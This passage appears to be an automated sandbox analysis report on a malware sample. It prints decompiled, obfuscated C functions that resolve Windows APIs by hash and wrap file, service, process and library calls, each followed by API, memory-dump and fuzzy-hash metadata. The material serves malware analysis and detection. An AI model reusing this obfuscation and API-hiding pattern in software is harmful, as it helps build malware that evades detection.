                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E002D07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}

                                          APIs
                                          • CreateFileW.KERNELBASE(002D0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,002D0668,?,?,?,?), ref: 002CB5FD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 1fbe7ef9f6afe1d6efb1d44d9f07503704930d2c94ac1c71e4ac2df160b915ef
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 5311C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E002D981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E002C602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E002D07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002C87F2,0000CAAE,0000510C,AD82F196), ref: 002D989B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 2c51633d4c246871e96e4ff57fc1691c1bcd40268a549b6abb8376533ba22d93
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: 04014876801208BBDB04EF95D846CDFBF79EF85750F108199F918A6220E6715A619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E002D7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E002C602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E002D07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 002D7C67
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 98b9ead3d77cd507f006e07941fd9aeac6c860a770375a293ecb7be6740ed866
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 0C014FB190120CFFEB09DF94C84A9DEBBB5EF44314F108199F40567250E6B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E002CF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				void* _t29;
                                          				int _t35;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t35 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E002C602B(_t24);
                                          				_v12 = 0xd5a7;
                                          				_v12 = _v12 ^ 0x994cba9d;
                                          				_v12 = _v12 ^ 0x994c19d3;
                                          				_v8 = 0xac88;
                                          				_v8 = _v8 << 3;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 + 0xebed;
                                          				_v8 = _v8 ^ 0x0000ab82;
                                          				E002D07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                          				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                          				return _t29;
                                          			}









                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 002CF6D8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: c9a7883a01ad5096fc959c29a9ef5f670f9845c0b542d419713b3e700c14c3f7
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 0C01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90466250D6B25E21DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E002CB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          
                                          				E002C602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E002D07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 002CB759
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 9b32fb81d0d8175117ce20a7d91db7207e3653248179239a21ca5cb686d466e1
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 28014FB595130CFBEF45DF94DD06E9E7BB5EF14704F108188FA09661A0D3B15E209B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E002DAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E002C602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E002D07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 002DAAA8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 194b06c5647a5d1072d7e8c7bc8ce5f826f7c593c73fb7e5fd8c6c451a2ef93a
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 69F069B191020CFFDF08DF94DD4A99EBFB4EB40304F108188F805A6260D3B29F649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E002C5FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E002C602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E002D07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 002C6025
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 06c572578a309482a68677b761cd3e400cab6d7170db5e6cfd4035d987ce0908
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: E5F04FB0C11208FFEB08DFA0E94689EBFB8EB40300F20819CE409A7260E7B15F159F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 62%
                                          			E00222959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E0022602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E002307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002229DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 37b4d298cd155c94a1be96190f1608c22ec2d5d7dc8241c68084df23160ea007
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E5016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0022C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E0022602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E002307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0022C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 9aff3a284bdbc7005846512a2e192847c3488d4c6c202e5d49d862151a6953d0
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 711133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3B14B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00221000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E0022602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E002307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00221096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 9b0b4243c09f153743ba963f172af61627f32187394d3e2d1bec8dfbc1c5dfe0
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 8C015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00224859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E002307A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}







                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002248B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 81f399a38b3290deff4e9d0da5b8e83badc44d24b0f9d8852c102545871cb71b
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 7AF017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E00234F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0022602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E002307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00234FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: 425c42de30eaec02a6b06aeb807420b13a9b3e840beb4bdeece3b006ea06cbfa
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: E9F037B181120CFFDB04DFA4D98689EBFBAEB40300F208199E804AB250D3715B50AB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E0023976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0022602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E002307A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}









                                          APIs
                                          • CreateProcessW.KERNEL32(0022591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0022591A), ref: 00239816
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 9a7324920c6fa73872278b88570e0d2bf5650161ff1a26a3230580b4f81e3e9e
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 3B11B072911188BBDF1A9FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E0022B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E0022602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E002307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNELBASE(00230668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00230668,?,?,?,?), ref: 0022B5FD
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: e1549cc0f43a334951d18b49cf8d68a4c31339b5c1d8a32f795c95a95794c2c5
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 8511C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

